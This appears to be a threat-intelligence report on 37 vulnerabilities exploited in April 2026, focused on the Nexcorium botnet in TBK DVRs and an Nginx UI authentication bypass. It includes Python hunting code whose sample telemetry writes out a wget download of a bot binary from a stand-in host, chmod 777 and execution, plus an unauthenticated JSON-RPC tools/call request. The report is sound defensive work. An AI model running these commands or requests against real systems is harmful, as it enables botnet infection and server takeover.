Severity: critical

April 2026 CVE Landscape

In April 2026, 37 high-impact vulnerabilities were actively exploited, heavily impacting enterprise systems and edge infrastructure. Notable exploitation includes the delivery of the Nexcorium botnet via CVE-2024-3721 in TBK DVR devices and complete service takeovers of Nginx UI instances via CVE-2026-33032, a missing authentication flaw.

Sens: Immediate | Conf: high | Analyzed: 2026-05-15

Authors: Insikt Group

Actors: Storm-1175, Medusa ransomware, Sorry Ransomware, Nexus Team, Nexcorium botnet, Mirai

Source: Recorded Future

Detection / Hunter

What Happened

In April 2026, security researchers observed attackers actively exploiting 37 different software vulnerabilities. These flaws affect a wide range of enterprise software, including Microsoft products, Nginx UI, and TBK digital video recorders. This matters because attackers are using these weaknesses to deploy ransomware and take over systems to build botnets. Organizations should immediately review the list of exploited vulnerabilities and apply the necessary software updates to protect their networks.

Key Takeaways

  • Insikt Group identified 37 high-impact vulnerabilities actively exploited in April 2026, with 31 listed in CISA's KEV catalog.
  • Seven vulnerabilities were linked to ransomware operations, including Storm-1175's Medusa and Sorry Ransomware.
  • CVE-2024-3721 in TBK DVR devices is being actively exploited to deliver the Mirai-based Nexcorium botnet.
  • CVE-2026-33032, a missing authentication flaw in Nginx UI, allows unauthenticated remote attackers to achieve complete service takeover.

Affected Systems

  • Microsoft Office, Exchange, Windows Server, SharePoint, Defender
  • Adobe Acrobat and Acrobat Reader
  • TBK DVR-4104 and DVR-4216 systems
  • Nginx UI (version 2.3.3 and earlier)
  • Fortinet FortiClient EMS
  • Cisco Catalyst SD-WAN Manager
  • Ivanti Endpoint Manager Mobile
  • ConnectWise ScreenConnect
  • JetBrains TeamCity On-Premises

Vulnerabilities (CVEs)

  • CVE-2009-0238
  • CVE-2012-1854
  • CVE-2020-9715
  • CVE-2023-21529
  • CVE-2023-27351
  • CVE-2023-36424
  • CVE-2024-1708
  • CVE-2024-27199
  • CVE-2024-3721
  • CVE-2024-57726
  • CVE-2024-57728
  • CVE-2024-7399
  • CVE-2025-2749
  • CVE-2025-29635
  • CVE-2025-32975
  • CVE-2025-48700
  • CVE-2025-60710
  • CVE-2026-1340
  • CVE-2026-20122
  • CVE-2026-20128
  • CVE-2026-20133
  • CVE-2026-21643
  • CVE-2026-32201
  • CVE-2026-32202
  • CVE-2026-33032
  • CVE-2026-33825
  • CVE-2026-34197
  • CVE-2026-34621
  • CVE-2026-3502
  • CVE-2026-35616
  • CVE-2026-39987
  • CVE-2026-41940
  • CVE-2026-5281

Attack Chain

Threat actors exploit CVE-2024-3721 in TBK DVR devices via crafted requests to the mdb and mdc arguments, dropping a downloader script named 'dvr'. This script retrieves the Nexcorium botnet binaries (named with the prefix 'nexuscorp'), sets their permissions to 777 with chmod, and executes them. Separately, attackers exploit CVE-2026-33032 in Nginx UI by sending unauthenticated JSON-RPC requests to the /mcpmessage endpoint, bypassing Nginx UI's IP allowlists to invoke MCP tools that overwrite Nginx configuration files and trigger service reloads.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: Yes
  • Platforms: Nuclei

Recorded Future's Insikt Group has created Nuclei templates to detect the missing authentication vulnerabilities in Nginx UI (CVE-2026-33032) and Marimo (CVE-2026-39987).

Detection Engineering Assessment

  • EDR Visibility: Medium. On supported operating systems, EDR can observe execution of the 'dvr' downloader script, the subsequent 'nexuscorp' binaries, and the chmod 777 commands. Visibility into IoT devices such as TBK DVRs is typically non-existent, so the Nexcorium chain on the DVRs themselves will usually be seen only from the network side.
  • Network Visibility: High. Network sensors can match the X-Hacked-By request header and the JSON-RPC requests to the /mcpmessage endpoint, provided the traffic is cleartext or TLS-inspected; for TLS sessions without inspection only flow metadata (source, destination, timing, volume) remains.
  • Detection Difficulty: Moderate. Network signatures for these two exploits are straightforward, but the diversity of the 37 CVEs and the lack of EDR on IoT devices complicate comprehensive detection.

Required Log Sources

  • Web Server Access Logs
  • Process Creation Logs
  • Network Flow Logs

Hunting Hypotheses

  • Hypothesis: Consider hunting for HTTP requests containing the 'X-Hacked-By' header with the value 'Nexus Team - Exploited By Erratic' targeting edge devices. | Telemetry: Web Server Access Logs, Network Flow Logs | ATT&CK Stage: Initial Access | FP Risk: Low
  • Hypothesis: If you have visibility into Nginx UI traffic, consider hunting for unauthenticated POST requests to the /mcpmessage endpoint containing JSON-RPC method calls like 'tools/call'. | Telemetry: Web Server Access Logs | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Consider hunting for process execution events where a script named 'dvr' downloads and executes files with the prefix 'nexuscorp' after changing their permissions to 777. | Telemetry: Process Creation Logs | ATT&CK Stage: Execution | FP Risk: Low
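As an added worked example (not Recorded Future's Nuclei templates or any code from Nginx UI, TBK or this page), the three hypotheses above expressed as Python hunting logic and run over constructed sample telemetry. It assumes web events arrive as JSON records that include request headers and body; the default combined access log format records neither, so a reverse proxy, WAF or network sensor log is the realistic source for H1 and H2. Process events are assumed to be JSON records with host, timestamp and command line. The host names, addresses, the 'placeholder_tool' MCP tool name and the download URL are all made up for the sample; only the header value, endpoint, script name and binary prefix come from the page.

```python
"""Hunting logic for the three hypotheses above, run over constructed sample
telemetry. Added example; not Recorded Future, Nginx UI or TBK code."""
import json, os, shlex
from dataclasses import dataclass

NEXUS_HEADER = "x-hacked-by"                       # indicators from this page
NEXUS_VALUE = "Nexus Team - Exploited By Erratic"
MCP_PATH = "/mcpmessage"
BOT_PREFIX = "nexuscorp"

@dataclass(frozen=True)
class Finding:
    hypothesis: str
    host: str
    detail: str

def _jsonrpc_methods(body: str) -> set[str]:
    """JSON-RPC method names in a request body (single object or batch list)."""
    try:
        doc = json.loads(body or "")
    except json.JSONDecodeError:
        return set()
    items = doc if isinstance(doc, list) else [doc]
    return {i["method"] for i in items if isinstance(i, dict) and isinstance(i.get("method"), str)}

def hunt_web(events: list[dict]) -> list[Finding]:
    """H1 (Nexus Team header) and H2 (unauthenticated tools/call to /mcpmessage)."""
    findings = []
    for ev in events:
        hdrs = {k.lower(): v for k, v in ev.get("headers", {}).items()}
        path = ev.get("path", "").split("?", 1)[0]  # compare without the query string
        if hdrs.get(NEXUS_HEADER, "").strip() == NEXUS_VALUE:
            findings.append(Finding("H1-nexus-header", ev["dst_host"],
                                    f"{ev['src_ip']} {ev['method']} {ev['path']}"))
        if (ev.get("method") == "POST" and path == MCP_PATH and "authorization" not in hdrs
                and "tools/call" in _jsonrpc_methods(ev.get("body", ""))):
            findings.append(Finding("H2-mcp-unauth-tools-call", ev["dst_host"],
                                    f"{ev['src_ip']} tools/call without Authorization"))
    return findings

def _argv(ev: dict) -> list[str]:
    try:
        return shlex.split(ev.get("cmdline", ""))
    except ValueError:  # unbalanced quotes in a hostile command line
        return ev.get("cmdline", "").split()

def hunt_process(events: list[dict], window_s: int = 300) -> list[Finding]:
    """H3: on one host a script named 'dvr' runs, then within window_s seconds
    chmod 777 is applied to a nexuscorp* file, which is then executed."""
    by_host: dict[str, list[dict]] = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    findings = []
    for host, evs in by_host.items():
        # Any argv token whose basename is exactly 'dvr' (e.g. "sh /tmp/dvr").
        dvr_ts = [e["ts"] for e in evs if any(os.path.basename(a) == "dvr" for a in _argv(e))]
        for e in evs:
            argv = _argv(e)
            if not argv or os.path.basename(argv[0]) != "chmod" or "777" not in argv:
                continue
            targets = [a for a in argv[1:] if os.path.basename(a).startswith(BOT_PREFIX)]
            if not targets or not any(0 <= e["ts"] - t <= window_s for t in dvr_ts):
                continue
            later = [_argv(x) for x in evs if 0 <= x["ts"] - e["ts"] <= window_s]
            if any(a and os.path.basename(a[0]) == os.path.basename(t) for a in later for t in targets):
                findings.append(Finding("H3-dvr-nexcorium-chain", host,
                                        f"chmod 777 {' '.join(targets)} then executed"))
    return findings

# Constructed sample telemetry: hosts, addresses, tool name and URL are made up.
TOOLS_CALL = json.dumps({"jsonrpc": "2.0", "id": 1, "method": "tools/call",
                         "params": {"name": "placeholder_tool", "arguments": {}}})
SAMPLE_WEB = [
    {"src_ip": "198.51.100.7", "dst_host": "dvr-cam-01", "method": "GET", "body": "",
     "path": "/device.rsp?mdb=sample&mdc=sample",
     "headers": {"X-Hacked-By": "Nexus Team - Exploited By Erratic"}},
    {"src_ip": "198.51.100.8", "dst_host": "nginx-ui-01", "method": "POST", "path": "/mcpmessage",
     "headers": {"Content-Type": "application/json"}, "body": TOOLS_CALL},
    {"src_ip": "10.0.0.5", "dst_host": "nginx-ui-01", "method": "POST", "path": "/mcpmessage",
     "headers": {"Authorization": "Bearer REDACTED"}, "body": TOOLS_CALL},  # authenticated: no finding
]
SAMPLE_PROC = [
    {"host": "dvr-cam-01", "ts": 100, "cmdline": "sh /tmp/dvr"},
    {"host": "dvr-cam-01", "ts": 103, "cmdline": "wget http://203.0.113.10/nexuscorp.arm7 -O /tmp/nexuscorp.arm7"},
    {"host": "dvr-cam-01", "ts": 104, "cmdline": "chmod 777 /tmp/nexuscorp.arm7"},
    {"host": "dvr-cam-01", "ts": 105, "cmdline": "/tmp/nexuscorp.arm7"},
    {"host": "build-01", "ts": 200, "cmdline": "chmod 777 /tmp/build.sh"},  # benign: no chain
]

def run_sample() -> list[Finding]:
    return hunt_web(SAMPLE_WEB) + hunt_process(SAMPLE_PROC)

if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.hypothesis}] {f.host}: {f.detail}")
```

Run the file directly to print the findings for the sample. H3 fires only when all three steps occur on one host inside the window, which keeps lone chmod 777 events (routine on build hosts) from alerting; if the environment tolerates the noise, the standalone chmod 777 indicator from the Key Behavioral Indicators list can be emitted as a separate lower-confidence finding.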

Control Gaps

  • Lack of EDR deployment on IoT/DVR devices
  • Insufficient network segmentation for management interfaces like Nginx UI

Key Behavioral Indicators

  • HTTP header 'X-Hacked-By: Nexus Team - Exploited By Erratic'
  • Requests to /mcpmessage endpoint in Nginx UI without Authorization headers
  • Execution of chmod 777 on newly downloaded binaries in edge devices

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Consider applying vendor-supplied patches for the 37 identified vulnerabilities, prioritizing those listed in the CISA KEV catalog.
  • Evaluate whether Nginx UI instances can be updated to version 2.3.4 or later to remediate CVE-2026-33032.
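To act on the KEV-first prioritisation above, an added Python example (not from Recorded Future or CISA) that ranks this page's CVEs against the CISA KEV feed: KEV entries first, ransomware-linked entries before the rest, overdue remediation dates before future ones. It assumes the real feed's JSON shape (a 'vulnerabilities' array whose entries carry cveID, dueDate and knownRansomwareCampaignUse); the embedded sample entries are constructed placeholders rather than CISA's actual records, so replace SAMPLE_KEV_JSON with the downloaded feed and PAGE_CVES with the full list above before use.

```python
"""Rank the CVEs listed on this page by CISA KEV status, ransomware use and
remediation due date. Added example; the KEV entries below are placeholders."""
import json
from datetime import date

PAGE_CVES = ["CVE-2009-0238", "CVE-2024-1708", "CVE-2024-3721", "CVE-2026-33032", "CVE-2026-39987"]

# Constructed sample in the shape of known_exploited_vulnerabilities.json.
# Dates and ransomware flags are made up for illustration, not CISA's data.
SAMPLE_KEV_JSON = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2009-0238", "dueDate": "2026-04-30", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-1708", "dueDate": "2026-04-25", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2024-3721", "dueDate": "2026-05-01", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2026-33032", "dueDate": "2026-05-20", "knownRansomwareCampaignUse": "Unknown"},
]})


def load_kev(text: str) -> dict[str, dict]:
    """Index a KEV feed by CVE ID (uppercased, so lookups are case-insensitive)."""
    return {v["cveID"].upper(): v for v in json.loads(text)["vulnerabilities"]}


def prioritise(cves: list[str], kev: dict[str, dict], today: date) -> list[dict]:
    """Order: in KEV before not; ransomware-linked first; overdue first; then by
    due date; CVE ID as a stable tiebreak."""
    rows = []
    for cve in cves:
        entry = kev.get(cve.upper())
        due = date.fromisoformat(entry["dueDate"]) if entry and entry.get("dueDate") else None
        rows.append({
            "cve": cve.upper(),
            "in_kev": entry is not None,
            "ransomware": bool(entry) and entry.get("knownRansomwareCampaignUse") == "Known",
            "due": due,
            "overdue": due is not None and due < today,
        })
    rows.sort(key=lambda r: (not r["in_kev"], not r["ransomware"], not r["overdue"],
                             r["due"] or date.max, r["cve"]))
    return rows


def ranked_ids(cves=PAGE_CVES, kev_text=SAMPLE_KEV_JSON, today=date(2026, 5, 15)) -> list[str]:
    """Just the CVE IDs in priority order (today defaults to this page's analysis date)."""
    return [r["cve"] for r in prioritise(cves, load_kev(kev_text), today)]


if __name__ == "__main__":
    for r in prioritise(PAGE_CVES, load_kev(SAMPLE_KEV_JSON), date(2026, 5, 15)):
        flag = "KEV" if r["in_kev"] else "not in KEV"
        print(f"{r['cve']:<15} {flag:<11} ransomware={r['ransomware']!s:<5} due={r['due']} overdue={r['overdue']}")
```

CVEs absent from KEV sink to the bottom of the list but are not dropped: the page counts 37 exploited vulnerabilities against 31 KEV entries, so the non-KEV remainder still needs a patch decision, just a lower-ranked one.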

Infrastructure Hardening

  • Consider restricting access to management interfaces like Nginx UI to trusted internal IP addresses or VPNs.
  • If applicable, evaluate network segmentation policies to isolate IoT devices like TBK DVRs from critical enterprise networks.

User Protection

  • Consider implementing strict access controls and monitoring for remote support tools like ConnectWise ScreenConnect and SimpleHelp.

Security Awareness

  • Consider updating vulnerability management training to emphasize the rapid exploitation timelines (as fast as two days) observed for recent CVEs.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1222.002 - File and Directory Permissions Modification: Linux and Mac
  • T1562.001 - Impair Defenses: Disable or Modify Tools

Additional IOCs

  • Command Lines:
    • Purpose: Modify permissions of downloaded botnet binaries to make them executable | Tools: chmod | Stage: Execution | chmod 777